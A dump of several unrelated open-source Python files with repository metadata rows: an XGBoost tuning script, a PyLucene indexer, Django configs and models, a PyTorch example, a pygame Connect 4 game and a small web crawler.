        alg.set_params(n_estimators=cvresult.shape[0])
    # Fit the model (was: 建模)
    alg.fit(dtrain[predictors], dtrain['Disbursed'],eval_metric='auc')
    # Predict on the training set (was: 对训练集预测)
    dtrain_predictions = alg.predict(dtrain[predictors])
    dtrain_predprob = alg.predict_proba(dtrain[predictors])[:,1]
    # Print training-set metrics (was: 输出模型的一些结果)
    print("\n关于现在这个模型")
    print("准确率 : %.4g" % metrics.accuracy_score(dtrain['Disbursed'].values, dtrain_predictions))
    print("AUC 得分 (训练集): %f" % metrics.roc_auc_score(dtrain['Disbursed'], dtrain_predprob))
    # NOTE(review): alg.booster() is the pre-0.8 xgboost API (newer releases
    # use get_booster()) — consistent with the deprecated sklearn modules
    # (cross_validation / grid_search) this script imports.
    feat_imp = pd.Series(alg.booster().get_fscore()).sort_values(ascending=False)
    feat_imp.plot(kind='bar', title='Feature Importances')
    plt.ylabel('Feature Importance Score')
# All feature columns: everything except the target and the row identifier.
predictors = [x for x in train.columns if x not in [target, IDcol]]
# Baseline model with a relatively high learning rate; the oversized
# n_estimators is tuned down by the CV step inside modelfit().
xgb1 = XGBClassifier(
 learning_rate =0.1,
 n_estimators=1000,
 max_depth=5,
 min_child_weight=1,
 gamma=0,
 subsample=0.8,
 colsample_bytree=0.8,
 objective= 'binary:logistic',
 nthread=4,
 scale_pos_weight=1,
 seed=27)
modelfit(xgb1, train, test, predictors)
# Step 1: coarse grid search over max_depth and min_child_weight.
#
# Bug fix: the grids were written as [range(3,10,2)] / [range(1,6,2)], i.e.
# one-element lists whose single "candidate" was the whole range object, so
# GridSearchCV tried to set max_depth to a sequence instead of trying each
# value.  The candidate list must be the values themselves.
param_test1 = {
 'max_depth': list(range(3, 10, 2)),
 'min_child_weight': list(range(1, 6, 2))
}
gsearch1 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=140, max_depth=5,
 min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
 objective= 'binary:logistic', nthread=4, scale_pos_weight=1, seed=27),
 param_grid = param_test1, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch1.fit(train[predictors],train[target])
print(gsearch1.grid_scores_, gsearch1.best_params_, gsearch1.best_score_)
# Step 2: refine max_depth and min_child_weight around the step-1 optimum.
param_test2 = {
 'max_depth':[4,5,6],
 'min_child_weight':[4,5,6]
}
gsearch2 = GridSearchCV(estimator = XGBClassifier( learning_rate=0.1, n_estimators=140, max_depth=5,
 min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8,
 objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
 param_grid = param_test2, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch2.fit(train[predictors],train[target])
print(gsearch2.grid_scores_, gsearch2.best_params_, gsearch2.best_score_)
# Step 2b: cross-validate larger min_child_weight values.
param_test2b = {
 'min_child_weight':[6,8,10,12]
}
gsearch2b = GridSearchCV(estimator = XGBClassifier( learning_rate=0.1, n_estimators=140, max_depth=4,
 min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8,
 objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
 param_grid = param_test2b, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch2b.fit(train[predictors],train[target])
print(gsearch2b.grid_scores_, gsearch2b.best_params_, gsearch2b.best_score_)
# Step 3: grid search over gamma.
param_test3 = {
 'gamma':[i/10.0 for i in range(0,5)]
}
gsearch3 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=140, max_depth=4,
 min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
 objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
 param_grid = param_test3, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch3.fit(train[predictors],train[target])
print(gsearch3.grid_scores_, gsearch3.best_params_, gsearch3.best_score_)
# Refit with the tuned tree parameters; modelfit's CV step re-selects the
# number of boosting rounds.
predictors = [x for x in train.columns if x not in [target, IDcol]]
xgb2 = XGBClassifier(
 learning_rate =0.1,
 n_estimators=1000,
 max_depth=4,
 min_child_weight=6,
 gamma=0,
 subsample=0.8,
 colsample_bytree=0.8,
 objective= 'binary:logistic',
 nthread=4,
 scale_pos_weight=1,
 seed=27)
modelfit(xgb2, train, test, predictors)
# Step 4: grid search over subsample and colsample_bytree (coarse).
param_test4 = {
 'subsample':[i/10.0 for i in range(6,10)],
 'colsample_bytree':[i/10.0 for i in range(6,10)]
}
gsearch4 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
 min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
 objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
 param_grid = param_test4, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch4.fit(train[predictors],train[target])
print(gsearch4.grid_scores_, gsearch4.best_params_, gsearch4.best_score_)
# Same as above, finer 0.05-step grid.
param_test5 = {
 'subsample':[i/100.0 for i in range(75,90,5)],
 'colsample_bytree':[i/100.0 for i in range(75,90,5)]
}
gsearch5 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
 min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
 objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
 param_grid = param_test5, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch5.fit(train[predictors],train[target])
print(gsearch5.grid_scores_, gsearch5.best_params_, gsearch5.best_score_)
# Step 5: grid search over the L1 regularisation term reg_alpha (coarse).
param_test6 = {
 'reg_alpha':[1e-5, 1e-2, 0.1, 1, 100]
}
gsearch6 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
 min_child_weight=6, gamma=0.1, subsample=0.8, colsample_bytree=0.8,
 objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
 param_grid = param_test6, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch6.fit(train[predictors],train[target])
print(gsearch6.grid_scores_, gsearch6.best_params_, gsearch6.best_score_)
# Finer reg_alpha grid around the best coarse value.
param_test7 = {
 'reg_alpha':[0, 0.001, 0.005, 0.01, 0.05]
}
gsearch7 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
 min_child_weight=6, gamma=0.1, subsample=0.8, colsample_bytree=0.8,
 objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
 param_grid = param_test7, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch7.fit(train[predictors],train[target])
print(gsearch7.grid_scores_, gsearch7.best_params_, gsearch7.best_score_)
# Fully tuned model at learning_rate 0.1.
xgb3 = XGBClassifier(
 learning_rate =0.1,
 n_estimators=1000,
 max_depth=4,
 min_child_weight=6,
 gamma=0,
 subsample=0.8,
 colsample_bytree=0.8,
 reg_alpha=0.005,
 objective= 'binary:logistic',
 nthread=4,
 scale_pos_weight=1,
 seed=27)
modelfit(xgb3, train, test, predictors)
# Final model: lower learning rate with proportionally more trees.
xgb4 = XGBClassifier(
 learning_rate =0.01,
 n_estimators=5000,
 max_depth=4,
 min_child_weight=6,
 gamma=0,
 subsample=0.8,
 colsample_bytree=0.8,
 reg_alpha=0.005,
 objective= 'binary:logistic',
 nthread=4,
 scale_pos_weight=1,
 seed=27)
modelfit(xgb4, train, test, predictors)
| [
"nan.zhao@outlook.com"
] | nan.zhao@outlook.com |
a5f144cda85255c89c8eae8cce97e66577ba1acd | 2e26a9fab5581759510b18002f32c7472b5e5991 | /Corpus/IndexFilesFr.py | 4daf4dfeb240a5f5bbfe2d73f1e5890bc88698a8 | [] | no_license | shilpadhagat/InformationRetrievalProject-EnglishtoFrenchQueryTranslation | 02f3b514bef6ec3d3171e71c96c1969150dd69f7 | fa89d6e7d85b0ce9bdd2116239b512e2a06b3e55 | refs/heads/master | 2021-01-21T20:11:16.103327 | 2017-05-23T17:55:32 | 2017-05-23T17:55:32 | 92,201,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,689 | py | #!/usr/bin/env python
INDEX_DIR = "IndexFilesFR.index."
import sys, os, lucene, threading, time
from datetime import datetime
from java.nio.file import Paths
from org.apache.lucene.analysis.miscellaneous import LimitTokenCountAnalyzer
from org.apache.lucene.analysis.standard import StandardAnalyzer
from org.apache.lucene.document import Document, Field, FieldType
from org.apache.lucene.index import \
FieldInfo, IndexWriter, IndexWriterConfig, IndexOptions
from org.apache.lucene.store import SimpleFSDirectory
from org.apache.lucene.analysis.fr import FrenchAnalyzer
"""
This class is loosely based on the Lucene (java implementation) demo class
org.apache.lucene.demo.IndexFiles. It will take a directory as an argument
and will index all of the files in that directory and downward recursively.
It will index on the file path, the file name and the file contents. The
resulting Lucene index will be placed in the current directory and called
'index'.
"""
class Ticker(object):
    """Progress indicator: prints one dot per second to stdout.

    Another thread stops it by clearing the ``tick`` flag.
    """

    def __init__(self):
        self.tick = True  # cooperative stop flag, cleared externally

    def run(self):
        """Emit '.' every second until ``tick`` is set to False."""
        while True:
            if not self.tick:
                break
            sys.stdout.write('.')
            sys.stdout.flush()
            time.sleep(1.0)
class IndexFiles(object):
    """Usage: python IndexFiles <doc_directory>"""
    # NOTE: Python 2 only (print statements, `unicode`, `except Exception, e`).
    def __init__(self, root, storeDir, analyzer):
        # Build (or rebuild) a Lucene index of all .rtf files under `root`,
        # storing it in `storeDir`.
        if not os.path.exists(storeDir):
            os.mkdir(storeDir)
        store = SimpleFSDirectory(Paths.get(storeDir))
        analyzer = LimitTokenCountAnalyzer(analyzer, 1048576, True) #no token limit
        config = IndexWriterConfig(analyzer)
        # CREATE mode: any existing index in storeDir is overwritten.
        config.setOpenMode(IndexWriterConfig.OpenMode.CREATE)
        writer = IndexWriter(store, config)
        self.indexDocs(root, writer)
        # Print progress dots from a background thread while committing.
        ticker = Ticker()
        print 'commit index',
        threading.Thread(target=ticker.run).start()
        writer.commit()
        writer.close()
        ticker.tick = False
        print 'done'
    def indexDocs(self, root, writer):
        # t1: stored but not tokenized (exact-match metadata fields).
        t1 = FieldType()
        t1.setStored(True)
        t1.setTokenized(False)
        t1.setIndexOptions(IndexOptions.DOCS_AND_FREQS)
        # t2: tokenized full-text field, not stored (index-only).
        t2 = FieldType()
        t2.setStored(False)
        t2.setTokenized(True)
        t2.setIndexOptions(IndexOptions.DOCS_AND_FREQS_AND_POSITIONS)
        for root, dirnames, filenames in os.walk(root):
            for filename in filenames:
                # Only .rtf documents are indexed.
                if not filename.endswith('.rtf'):
                    continue
                print "adding", filename
                try:
                    path = os.path.join(root, filename)
                    file = open(path)
                    # Files are assumed Latin-1 encoded.
                    contents = unicode(file.read(), 'iso-8859-1')
                    file.close()
                    doc = Document()
                    doc.add(Field("name", filename, t1))
                    doc.add(Field("path", root, t1))
                    if len(contents) > 0:
                        doc.add(Field("contents", contents, t2))
                    else:
                        print "warning: no content in %s" % filename
                    writer.addDocument(doc)
                except Exception, e:
                    # Best-effort: log and keep indexing the remaining files.
                    print "Failed in indexDocs:", e
print "Failed in indexDocs:", e
if __name__ == '__main__':
    # Require the directory to index as the single CLI argument.
    if len(sys.argv) < 2:
        print IndexFiles.__doc__
        sys.exit(1)
    # Start the JVM before touching any PyLucene classes.
    lucene.initVM(vmargs=['-Djava.awt.headless=true'])
    print 'lucene', lucene.VERSION
    start = datetime.now()
    try:
        # Index is written next to this script, under INDEX_DIR.
        base_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
        IndexFiles(sys.argv[1], os.path.join(base_dir, INDEX_DIR),
                   FrenchAnalyzer())
        end = datetime.now()
        print end - start
    except Exception, e:
        print "Failed: ", e
        raise e
| [
"shilpa.dhagat15@gmail.com"
] | shilpa.dhagat15@gmail.com |
00f161eb5f05db86e565d105802f85bd8687b657 | ceb35c85a8ab0203b3d1b89fa6b6e66ff39bd449 | /conf/wsgi.py | 857f89e7e5f42d31f61a172d734440212a0a61ed | [] | no_license | kyg3766/django001 | 8d68754198c33c8dd1c6446bdfbef39dffaa3b7f | fe0ac35cbfbc2ba14fff3af455be33382baf0d19 | refs/heads/master | 2020-05-21T15:27:31.404706 | 2019-05-21T08:24:43 | 2019-05-21T08:24:43 | 186,091,172 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
WSGI config for django001 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings unless the environment overrides it.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'django001.settings')
# Module-level WSGI callable that servers (gunicorn, mod_wsgi, ...) import.
application = get_wsgi_application()
| [
"kyg3765@gmail.com"
] | kyg3765@gmail.com |
e1e70937d9a38b13566119952aec8004db6e8e40 | 286211702e50d6d29ee21dab902ed977e94382be | /pytorch/nn.py | 42e924ec23ce32c8bd88fbdd14fdea124a78b7c2 | [] | no_license | AustinArrington87/dev_practice | bcda3468a4607a2301ac572ee61d4548f34297df | 54796072388ed6e1a40417d5395d8927dea2acfa | refs/heads/master | 2021-05-19T08:55:25.407499 | 2021-01-11T02:07:16 | 2021-01-11T02:07:16 | 251,615,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,495 | py | # update weights in neural net /
# weight = weight*learning_rate * gradient
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# 1 input image channel, 6 output channels, 3x3 square convolution
# kernel
self.conv1 = nn.Conv2d(1, 6, 3)
self.conv2 = nn.Conv2d(6, 16, 3)
# an affine operation: y = Wx + b
self.fc1 = nn.Linear(16 * 6 * 6, 120) # 6*6 from image dimension
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# Max pooling over a (2, 2) window
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
# If the size is a square you can only specify a single number
x = F.max_pool2d(F.relu(self.conv2(x)), 2)
x = x.view(-1, self.num_flat_features(x))
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def num_flat_features(self, x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
net = Net()
print(net)
params = list(net.parameters())
print(len(params))
print(params[0].size()) # conv1's .weight
input = torch.randn(1, 1, 32, 32)
out = net(input)
print(out)
net.zero_grad()
out.backward(torch.randn(1, 10))
# calculate MSE - loss .
output = net(input)
target = torch.randn(10) # a dummy target, for example
target = target.view(1, -1) # make it the same shape as output
criterion = nn.MSELoss()
loss = criterion(output, target)
print(loss)
print(loss.grad_fn) # MSELoss
print(loss.grad_fn.next_functions[0][0]) # Linear
print(loss.grad_fn.next_functions[0][0].next_functions[0][0]) # ReLU
# backpropogate error
net.zero_grad() # zeroes the gradient buffers of all parameters
print('conv1.bias.grad before backward')
print(net.conv1.bias.grad)
loss.backward()
print('conv1.bias.grad after backward')
print(net.conv1.bias.grad)
# update weights
learning_rate = 0.01
for f in net.parameters():
f.data.sub_(f.grad.data * learning_rate)
# create your optimizer
optimizer = optim.SGD(net.parameters(), lr=0.01)
# in your training loop:
optimizer.zero_grad() # zero the gradient buffers
output = net(input)
loss = criterion(output, target)
loss.backward()
optimizer.step() # Does the update
| [
"austinarrington@Austins-MacBook-Pro.local"
] | austinarrington@Austins-MacBook-Pro.local |
ea87ce63693c7e88b7432ae72ea94603402ec4c1 | 11c7f9fb9468239cee3a611a26a3d1023712fd16 | /example/forms.py | 0afa940254e7f00c5539789167105c41bb3b4f44 | [] | no_license | r1s/baseflask | aa519ef21635ed6aa358850ddb77e1475042865b | fcfb1c31673c427819952e4887dd1c8b7effabe4 | refs/heads/master | 2021-01-22T02:08:17.091653 | 2014-09-30T11:21:21 | 2014-09-30T11:21:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | from flask.ext.wtf import Form
from wtforms import StringField, PasswordField, SubmitField
from wtforms.validators import DataRequired
from flask.ext.babel import gettext as _
class ExampleForm(Form):
    """Example WTForms form with a required title and description."""
    title = StringField('title', validators=[DataRequired()])
    # NOTE(review): PasswordField masks the input in the browser, which is
    # unusual for a field named "description" — confirm StringField or a
    # TextAreaField wasn't intended.
    description = PasswordField('description', validators=[DataRequired()])
    submit = SubmitField(_('save'))
"roman87.r1s@gmail.com"
] | roman87.r1s@gmail.com |
2002fa3d51540a011e0f86e28df864baf19415c5 | c4e77254221663ac63f3398241c57db8bee384f9 | /connect42 copy.py | e8912adeaf7d6d9dee5fb2d86f2e9d7326eee72e | [
"MIT"
] | permissive | yijiehuang0/connect4AI | dc7801bbb11bfe73c6dd851f6123b20a73284767 | 5a134ded8009fd51210a96ba2169920bf1b19aa8 | refs/heads/master | 2020-07-16T10:29:44.982273 | 2019-09-02T04:05:32 | 2019-09-02T04:05:32 | 205,771,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,952 | py | import numpy as np
import pygame
import sys
import math
ROW_COUNT = 6
COLUMN_COUNT = 7
BLUE = (0, 0 ,230)
BLACK = (0,0,0)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
def create_board(rows=None, cols=None):
    """Return a rows x cols board of zeros (empty cells).

    Backward compatible: with no arguments it uses the module-level
    ROW_COUNT x COLUMN_COUNT, exactly as before.  The dimensions are
    resolved at call time so they can also be passed explicitly.
    """
    if rows is None:
        rows = ROW_COUNT
    if cols is None:
        cols = COLUMN_COUNT
    board = np.zeros((rows, cols))
    return board
def drop_peice(col, board, row, peice):
    """Place ``peice`` (1 or 2) at (row, col), mutating the board in place."""
    board[row][col] = peice
def is_valid_location(col, board):
    """Return True if column ``col`` still has room (its top cell is empty).

    Generalized: the top row is taken from the board itself (negative
    indexing) instead of the module-level ROW_COUNT, so it works for any
    board height while behaving identically for the standard 6x7 board.
    """
    return board[-1][col] == 0
def get_next_open_row(col, board):
    """Return the lowest empty row index in column ``col``.

    Returns None if the column is full (unchanged implicit behaviour).
    Generalized: iterates over len(board) instead of the module-level
    ROW_COUNT, so any board height works.
    """
    for r in range(len(board)):
        if board[r][col] == 0:
            return r
def print_board(board):
    """Print the board flipped vertically so row 0 appears at the bottom."""
    print(np.flipud(board))
def winning_move(board, peice):
    """Return True if ``peice`` has four in a row in any direction.

    Generalized: board dimensions are read from the board itself instead of
    the module-level ROW_COUNT/COLUMN_COUNT, and the function now returns an
    explicit False (previously an implicit, equally falsy None) when there
    is no win.
    """
    rows = len(board)
    cols = len(board[0])
    # Horizontal locations for win
    for c in range(cols - 3):
        for r in range(rows):
            if board[r][c] == peice and board[r][c+1] == peice and board[r][c+2] == peice and board[r][c+3] == peice:
                return True
    # Vertical locations for win
    for c in range(cols):
        for r in range(rows - 3):
            if board[r][c] == peice and board[r+1][c] == peice and board[r+2][c] == peice and board[r+3][c] == peice:
                return True
    # Positive-slope diagonals
    for c in range(cols - 3):
        for r in range(rows - 3):
            if board[r][c] == peice and board[r+1][c+1] == peice and board[r+2][c+2] == peice and board[r+3][c+3] == peice:
                return True
    # Negative-slope diagonals
    for c in range(cols - 3):
        for r in range(3, rows):
            if board[r][c] == peice and board[r-1][c+1] == peice and board[r-2][c+2] == peice and board[r-3][c+3] == peice:
                return True
    return False
def draw_board(board):
    """Render the whole board to the global pygame surface.

    Uses module-level globals (screen, SQUARESIZE, RADIUS, height and the
    colour constants); note these are defined after this function in the
    file but before the first call, so lookup succeeds at call time.
    """
    # Blue frame with black (empty) circle cut-outs, drawn below the
    # one-square-high banner row at the top of the window.
    for c in range(COLUMN_COUNT):
        for r in range(ROW_COUNT):
            pygame.draw.rect(screen, BLUE, (c*SQUARESIZE, r*SQUARESIZE+SQUARESIZE, SQUARESIZE, SQUARESIZE))
            pygame.draw.circle(screen, BLACK, (int(c*SQUARESIZE+SQUARESIZE/2), int(r*SQUARESIZE+SQUARESIZE+SQUARESIZE/2)), RADIUS)
    # Player pieces; the y coordinate is flipped so row 0 renders at the
    # bottom of the window.
    for c in range(COLUMN_COUNT):
        for r in range(ROW_COUNT):
            if board[r][c] == 1:
                pygame.draw.circle(screen, RED, (int(c*SQUARESIZE+SQUARESIZE/2), height-int(r*SQUARESIZE+SQUARESIZE/2)), RADIUS)
            elif board[r][c] == 2:
                pygame.draw.circle(screen, YELLOW, (int(c*SQUARESIZE+SQUARESIZE/2), height-int(r*SQUARESIZE+SQUARESIZE/2)), RADIUS)
    pygame.display.update()
# ---- Game setup -----------------------------------------------------------
board = create_board()
#print_board(board)
game_over = False
playerturn = 0  # 0 = player 1 (red), 1 = player 2 (yellow)
pygame.init()
SQUARESIZE = 100
RADIUS = int(SQUARESIZE/2 - 5)
width = COLUMN_COUNT * SQUARESIZE
height = (ROW_COUNT+1) * SQUARESIZE  # extra row at the top for the hover piece
size = (width, height)
screen = pygame.display.set_mode(size)
draw_board(board)
pygame.display.update()
font = pygame.font.SysFont("monospace", 75)
# ---- Main event loop ------------------------------------------------------
while not game_over:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            sys.exit()
        # Track the mouse: draw the current player's piece in the banner row.
        if event.type == pygame.MOUSEMOTION:
            pygame.draw.rect(screen, BLACK, (0,0,width,SQUARESIZE))
            posx = event.pos[0]
            if playerturn == 0:
                pygame.draw.circle(screen, RED, (posx, int(SQUARESIZE/2)), RADIUS)
            else:
                pygame.draw.circle(screen, YELLOW, (posx, int(SQUARESIZE/2)), RADIUS)
        pygame.display.update()
        # A click drops the current player's piece in the clicked column.
        if event.type == pygame.MOUSEBUTTONDOWN:
            # print(event.pos)
            pygame.draw.rect(screen, BLACK, (0,0,width,SQUARESIZE))
            if playerturn == 0:
                posx = event.pos[0]
                col = int(math.floor(posx/SQUARESIZE))
                if is_valid_location(col, board):
                    row = get_next_open_row(col, board)
                    drop_peice(col, board, row, 1)
                    if winning_move(board, 1):
                        print("Player 1 Wins!")
                        label = font.render("Player 1 Wins!!!", 1, RED)
                        screen.blit(label, (40,10))
                        game_over = True
            else:
                posx = event.pos[0]
                col = int(math.floor(posx/SQUARESIZE))
                if is_valid_location(col, board):
                    row = get_next_open_row(col, board)
                    drop_peice(col, board, row, 2)
                    if winning_move(board, 2):
                        print("Player 2 Wins!")
                        label = font.render("Player 2 Wins!!!", 1, YELLOW)
                        screen.blit(label, (40,10))
                        game_over = True
            print_board(board)
            draw_board(board)
            # NOTE(review): the turn switches even when the clicked column was
            # full (invalid move) — likely unintended; confirm and move the
            # turn swap inside the is_valid_location branches if so.
            playerturn +=1
            playerturn = playerturn%2
            if game_over:
                pygame.time.wait(8000)
| [
"noreply@github.com"
] | noreply@github.com |
7e8eed3e3e234e712b3ae2ebb9a56d9680629cb5 | 64a955664b82be8ed149d01149b36a8aac626f8e | /chapter5/p5.py | 5ed71fd3dd2d87de56d123944936a15d519c8c03 | [] | no_license | JoelDavisP/Python-Practice-Book-Solutions | b60371590d8aaecab9de6ccad2bf2efb7a2f90ae | ea298d35e50d3719d5b0b841748abfd0c852cc95 | refs/heads/master | 2021-07-14T04:52:40.678170 | 2017-10-18T13:26:50 | 2017-10-18T13:26:50 | 105,724,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 652 | py | import os
import sys
def lines_py():
    """Yield a running total of lines across all ``.py`` files found
    recursively under the directory named in ``sys.argv[1]``.

    One value is yielded after each Python file is counted, so the last
    value yielded is the grand total.

    Fixes versus the original:
      * ``name.split('.')[1] == 'py'`` raised IndexError for files without
        a dot and misclassified names like ``a.b.py`` — use endswith().
      * Files were never closed — use a ``with`` block.
    """
    dname = sys.argv[1]
    dpath = os.path.abspath(dname)
    line_count = 0
    for fpath, dnames, fnames in os.walk(dpath):
        for name in fnames:
            if not name.endswith('.py'):
                continue
            full = os.path.join(fpath, name)
            with open(full, 'r') as fn:
                for _ in fn:
                    line_count += 1
            yield line_count
# Iterate the generator directly.  The old form
#     y = lines_py(); while True: print y.next()
# always terminated by crashing with StopIteration once the generator was
# exhausted.  print(count) with a single argument is valid in both
# Python 2 and Python 3.
for count in lines_py():
    print(count)
| [
"joeldavisp17195@gmail.com"
] | joeldavisp17195@gmail.com |
744ddd93eafd9e17d9a6f19e8f7f8dce9e306791 | a67d25a28df71edbc537de56a32156534b23f12d | /src/main.py | 9994360e0fb58cbe7ec630d197cd0bf48ad845c9 | [
"MIT"
] | permissive | deviantdear/Python_Webscraper | 0f90c5bb963c7af1e778f11a7447664d5c9e1c32 | 0dec8c673dbeac7f243d39834dd1fdd50cffd61c | refs/heads/master | 2020-04-08T10:43:49.212171 | 2018-12-03T18:40:19 | 2018-12-03T18:40:19 | 159,280,018 | 0 | 0 | MIT | 2018-12-03T18:40:20 | 2018-11-27T05:18:40 | null | UTF-8 | Python | false | false | 1,051 | py | import threading
from queue import Queue
from spider import Spider
from domain import *
from webscraper import *
# Crawler configuration.
PROJECT_NAME = 'thesite'
HOMEPAGE = 'http://manonthemoonstudio.com'
DOMAIN_NAME = get_domain_name(HOMEPAGE)
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
NUMBER_OF_THREADS = 8

# Bug fix: `queue = Queue` bound the class object itself, so the
# queue.put()/get()/join()/task_done() calls below were made on the class
# (unbound) and crashed.  It must be an instance.
queue = Queue()

# Instantiating Spider initializes the project files (queue/crawled lists).
Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
def crawl():
    """Read the on-disk queue; if links are waiting, dispatch them to the
    worker queue via create_jobs()."""
    queued_links = file_to_set(QUEUE_FILE)
    if len(queued_links) > 0:
        print(str(len(queued_links)) + ' Links in the queue')
        create_jobs()
def create_jobs():
    """Put every queued link onto the thread-safe queue, block until the
    workers have processed them all, then re-check the disk queue for
    newly discovered links.

    NOTE(review): crawl() and create_jobs() call each other recursively;
    a very deep crawl could exhaust the call stack — consider a loop.
    """
    for link in file_to_set(QUEUE_FILE):
        queue.put(link)
    queue.join()
    crawl()
def create_workers():
    """Spawn NUMBER_OF_THREADS daemon threads that each run work()."""
    for _ in range(NUMBER_OF_THREADS):
        worker = threading.Thread(target=work)
        worker.daemon = True  # don't block interpreter exit
        worker.start()
def work():
    """Worker loop: pull URLs off the shared queue and crawl them forever.

    task_done() pairs with queue.join() in create_jobs().
    """
    while True:
        url = queue.get()
        Spider.crawl_page(threading.current_thread().name, url)
        queue.task_done()
create_workers()  # start the daemon worker threads
crawl()           # seed the shared queue from disk and begin crawling
| [
"deviantdear@gmail.com"
] | deviantdear@gmail.com |
18358b4bfeee8c7fb31e081a3851426236e2cb81 | d842ef7b24e73abfb979f851a41d671013fbc90e | /chode_or_not/manage.py | bc42b278aa48989330dcc9ba11e0b0559dacaf09 | [] | no_license | 2121159i/Chode-Or-Not-Prototype | 2803183626adcd2cdf136affa09f6697c1fdbe5e | 39871d1676370d443d87738f089bf9554b352002 | refs/heads/master | 2020-04-06T05:02:51.406612 | 2016-07-17T22:42:55 | 2016-07-17T22:42:55 | 56,404,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "chode_or_not.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"airikov95@gmail.com"
] | airikov95@gmail.com |
2372f2175929e510edb3aa5c5b0f4d948aceeaca | 0f2c9b00bb38888037dc258dedf3c74a713e2954 | /catalog/models.py | 9dd76a30b972df6776551c10388c7e00697da32b | [] | no_license | MaxonKush/VS | e1426523899e3d587ee20d3845b3a0203c18fb67 | 1bb6224f0eca088812dbd8ee5396732363942c35 | refs/heads/master | 2023-03-08T11:59:38.705068 | 2020-12-06T22:44:15 | 2020-12-06T22:44:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,021 | py | from django.db import models
from django.core.exceptions import ValidationError
from django.urls import reverse
def validate_even(value):
    """Field validator: reject non-positive values.

    NOTE(review): despite its name this does NOT check evenness — it
    rejects values <= 0.  It is attached to engine size, fuel consumption
    and price fields below; renaming would touch migrations, so only
    documenting the misnomer here.
    """
    if value <= 0:
        raise ValidationError('%s Введите корректное значение' % value)
class Auto(models.Model):
    """A rental car, with its technical specs and daily rental price.

    Verbose names and choice labels are in Russian (user-facing text).
    """
    # Choice tuples for the CharField `choices` options below.
    TRANSMISSION = (
        ('АКПП', 'АКПП'),
        ('МКПП', 'МКПП'),
    )
    BODY_TYPE = (
        ('Седан', 'Седан'),
        ('Универсал', 'Универсал'),
        ('Хэтчбэк', 'Хэтчбэк'),
        ('Купе', 'Купе'),
        ('Лифтбэк', 'Лифтбэк'),
        ('Внедорожник', 'Внедорожник'),
        ('Родстер', 'Родстер'),
    )
    FUEL_TYPE = (
        ('Бензин', 'Бензин'),
        ('Дизель', 'Дизель'),
        ('Гибрид', 'Гибрид'),
    )
    COLOR = (
        ('Красный', 'Красный'),
        ('Синий', 'Синий'),
        ('Чёрный', 'Чёрный'),
        ('Зеленый', 'Зеленый'),
        ('Серый', 'Серый'),
        ('Белый', 'Белый'),
        ('Оранжевый', 'Оранжевый'),
        ('Жёлтый', 'Жёлтый'),
        ('Коричневый', 'Коричневый'),
    )
    BRAND=(
        ('Audi', 'Audi'),
        ('BMW', 'BMW'),
        ('Chevrolet', 'Chevrolet'),
        ('Citroen', 'Citroen'),
        ('Ford', 'Ford'),
        ('Geely', 'Geely'),
        ('Honda', 'Honda'),
        ('Hyundai', 'Hyundai'),
        ('Kia', 'Kia'),
        ('LADA', 'LADA'),
        ('Lexus', 'Lexus'),
